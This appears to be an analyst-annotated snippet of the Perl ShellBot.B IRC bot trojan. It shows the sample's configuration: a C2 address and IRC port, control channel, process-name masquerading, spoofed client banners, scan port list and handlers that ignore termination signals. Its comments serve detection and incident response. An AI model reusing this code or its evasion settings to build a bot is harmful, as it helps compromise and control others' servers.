Last active
January 1, 2016 06:59
A snippet of the Perl/ShellBot.B Trojan variant script observed from ISC Diary
#!/usr/bin/perl | |
# Analyst notes: hard-coded configuration block of the bot sample. The literal
# values are the sample's own and can serve as indicators. The code that
# consumes them is outside this snippet, so any role inferred from a variable
# name is marked as an assumption. The trailing " | |" on each line appears to
# be residue of the page's table rendering, not part of the script. No
# strict/warnings pragma appears in the visible lines.
#
# presumably the nicknames permitted to command the bot -- usage not visible here
my @mast3rs = ("pizza"); | |
# presumably the host name a controller must connect from -- confirm against full sample
my @hostauth = ("sosick.net"); | |
# presumably the IRC channel used for control -- confirm against full sample
my @admchan=("#X"); | |
# Network indicator: the only server address listed. Outbound connections from
# a server host to this address are worth alerting on.
my @server = ("89.248.172.144"); | |
# Picks a random entry of @server (only one exists) unless $servidor already
# holds a true value. $servidor is not declared with "my" in the visible lines,
# so it is a package variable.
$servidor= $server[rand scalar @server] unless $servidor; | |
# Two literal single-quote characters; purpose not visible in this snippet.
my $xeqt = "''"; | |
# Working directory setting; /tmp is world-writable. NOTE(review): presumably
# the bot operates from here -- a perl process with cwd /tmp deserves a look.
my $homedir = "/tmp"; | |
# Flags and limits below are set here and consumed outside this snippet.
# NOTE(review): "pacotes" is Portuguese for "packets"; "linas_max" looks like a
# per-reply line limit; $sleep and $portime look like delay/timeout values --
# all to be confirmed against the full sample.
my $shellaccess = 1; | |
my $xstats = 1; | |
my $pacotes = 1; | |
my $linas_max = 5; | |
my $sleep = 6; | |
my $portime = 4; | |
# Candidate process names. NOTE(review): presumably assigned to $0 so the
# process shows up as "-bin" in ps output; when triaging, compare the displayed
# name with /proc/<pid>/exe, which would still point at the perl interpreter.
my @fakeps = ("-bin"); | |
# presumably the IRC nickname and ident the bot registers with -- confirm
my @nickname = ("LINUX"); | |
my @xident = ("KAST"); | |
# Backticks execute `uname -a` when the script starts and store its output as
# the entries of @xname. A perl process spawning uname at start-up is a
# host-side signal that can be correlated with the network indicator above.
my @xname = (`uname -a`); | |
################# | |
# Random Ports | |
################# | |
# Only one port is listed, so the "random" choice is fixed. 6667 is the
# conventional plain-text IRC port; outbound 6667 from a server that has no
# reason to speak IRC is a useful egress-monitoring rule.
my @rports = ("6667"); | |
# Client version banners, each wrapped in \001 (the CTCP delimiter byte).
# NOTE(review): presumably one of these is returned to CTCP VERSION queries so
# the bot resembles an ordinary IRC client -- the reply code is not in this
# snippet. The strings are kept byte-for-byte because they are usable as
# content signatures for the sample.
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001", | |
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001", | |
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001", | |
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001", | |
"\001Snak for Macintosh 4.9.8 English\001", | |
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001", | |
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001", | |
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001", | |
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001", | |
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001", | |
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001", | |
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001", | |
"\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001", | |
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001", | |
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001", | |
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001", | |
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001", | |
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001", | |
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1<C2>?9] : Keep it to yourself!\001", | |
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001", | |
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001", | |
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001", | |
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001", | |
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001"); | |
# Default quick scan ports | |
# Port numbers stored as strings ("portas" is Portuguese for "ports"). The
# scanning code itself is not part of this snippet. NOTE(review): a single host
# attempting connections to this exact set of ports in a short window would be
# a plausible network signature -- confirm against the full sample.
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501"); | |
# xeQt | |
#my $nick = "Power"; | |
# Each value below is drawn at random from one of the lists defined earlier in
# the script. Every list except @Mrx holds a single entry (for @xname this
# assumes `uname -a` emits one line), so only $Mrx actually varies between runs.
my $nick = $nickname[rand scalar @nickname]; | |
my $realname = $xname[rand scalar @xname]; | |
my $ircname = $xident[rand scalar @xident]; | |
my $porta = $rports[rand scalar @rports]; | |
my $xproc = $fakeps[rand scalar @fakeps]; | |
my $Mrx = $Mrx[rand scalar @Mrx]; | |
# Static banner string; usable as a content signature when hunting for copies
# of this script on disk.
my $version = 'PowerBots (C) GohacK'; | |
# INT, HUP and TERM are ignored, so Ctrl-C, a terminal hang-up and a default
# `kill` (SIGTERM) will not stop the process; SIGKILL cannot be ignored and is
# what responders need to use once evidence has been collected.
$SIG{'INT'} = 'IGNORE'; | |
$SIG{'HUP'} = 'IGNORE'; | |
$SIG{'TERM'} = 'IGNORE'; | |
# Ignoring CHLD means child processes are reaped automatically on most Unix
# systems, so no zombie entries are left behind.
$SIG{'CHLD'} = 'IGNORE'; | |
# NOTE(review): 'PS' is not a standard signal name, so this assignment most
# likely has no effect -- confirm.
$SIG{'PS'} = 'IGNORE'; | |
# <-- snip --> |